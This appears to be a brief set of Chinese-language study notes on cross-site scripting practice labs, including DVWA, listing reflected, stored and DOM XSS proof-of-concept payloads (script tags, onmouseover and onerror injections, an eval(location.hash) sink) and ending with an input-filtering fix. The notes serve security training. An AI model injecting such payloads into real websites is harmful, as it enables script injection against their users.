xss攻击
1.简单的反射型XSS
输入:<script>alert('hello')</script>
2.简单的存储型XSS
管理员登录后台,触发xss
基础练习1:
基础练习2:
基础练习3:
中级练习1:
中级练习2:
中级练习3:
高级练习1:
name=';onmouseover=alert(1);'
name=';alert(1);'
name=';alert(1);//'
高级练习2:
高级练习3:
DOM XSS:
源代码:<script>eval(location.hash.substr(1));</script>
触发:#alert(1)
DVWA之反射型xss
反射型基础练习:
反射型中级练习:
反射型高级练习:
输入:<img src="#" onerror="alert(1)" />
DVWA存储型xss
存储型基础练习:
存储型中级练习:
将name限制改为30
存储型高级练习:
解决方法:
严格限制传入参数输入值的格式,过滤特殊字符( <、>、' 、" 、//等)。